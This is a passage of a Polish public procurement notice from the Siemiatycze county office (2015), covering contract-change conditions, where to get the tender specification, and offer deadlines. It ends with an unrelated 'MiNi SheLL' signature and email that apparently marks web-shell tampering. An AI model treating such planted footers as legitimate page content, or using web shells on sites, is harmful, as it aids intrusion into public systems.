1.  Zmiana terminu realizacji umowy:  
- przekroczenia zakreślonych przez prawo terminów wydawania przez organy administracji decyzji , zezwoleń itp.,
- odmowy wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej,  
- konieczności uzyskania wyroku sądowego lub innego orzeczenia sądu lub organu administracyjnego, którego konieczności nie przewidziano przy zawieraniu umowy,  
2.  Zmiany osobowe:  
a) zmiana osób przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w prawie budowlanym,  
Zmiana postanowień umowy, o których mowa w ust. 4, może nastąpić na podstawie uzasadnionego pisemnego wystąpienia Wykonawcy, przedłożonego do akceptacji Zamawiającego niezwłocznie po zaistnieniu okoliczności powodujących zmianę umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.st.siemiatycze.wrotapodlasia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe , ul. Legionów Piłsudskiego 3, 17-300 Siemiatycze  pokój 209 II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2015 godzina 11:00, miejsce: Oferty   należy złożyć w siedzibie zamawiającego, (Punkt Obsługi Klienta- parter) lub przesłać na adres   Starostwo Powiatowe , ul. Legionów Piłsudskiego 3..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com